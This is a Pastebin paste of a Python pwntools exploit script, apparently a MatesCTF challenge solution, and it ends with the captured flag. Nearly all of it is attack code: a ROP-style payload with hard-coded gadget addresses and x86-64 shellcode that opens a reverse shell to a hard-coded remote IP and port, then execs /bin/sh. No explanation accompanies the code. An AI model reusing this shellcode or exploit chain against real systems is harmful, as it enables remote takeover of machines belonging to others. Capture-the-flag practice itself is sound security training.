Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- from pwn import *
- io = process("./get_binary")
- context.clear()
- context.arch = "amd64"
- context.log_level = "debug"
- context.endian = "little"
- host = p32(0x675c1cd3)[::-1]
- port = "\x11\x5c"
- port1 = "\x7a\x69"
- shellcode = "\x90"*0x34 + p64(0x40055c) + "\x90"*8
- shellcode += "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a"
- shellcode += "\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0"
- shellcode += "\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24"
- shellcode += "\x02"+port+"\xc7\x44\x24\x04"+host+"\x48\x89\xe6\x6a\x10"
- shellcode += "\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48"
- shellcode += "\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a"
- shellcode += "\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54"
- shellcode += "\x5f\x6a\x3b\x58\x0f\x05"
- shellcode += "\x90"*(0x200-len(shellcode))
- syscall = 0x400364
- read = 0x4002BB
- p = "\x0f\x00\x00\x00"
- p += p64(0x400520+4)
- p += p64(0x400350)
- p += p64(read)
- p += p64(0xa)
- p += p64(0x400000)
- p += p64(0x1000)
- p += p64(0x7)
- p += p64(0x400500)
- p += p64(0x100)
- p += p64(0)*3
- p += "\x90"*(0x64-len(p))
- # gdb.attach(io)
- # io.send(p)
- x = "\x90"*4
- x += p64(0x400520+4)
- x += p64(0x400374)
- x += p64(0x200)
- x += p64(0)*3
- x += "A"*(0x64-len(x))
- with open("./get_ol", "wb") as f:
- f.write(p + x + shellcode)
- io.interactive()
- #MatesCTF{why_4m_1_s0_0bs3ss3d_w1th_bl1nd_RC3?}
Add Comment
Please, Sign In to add comment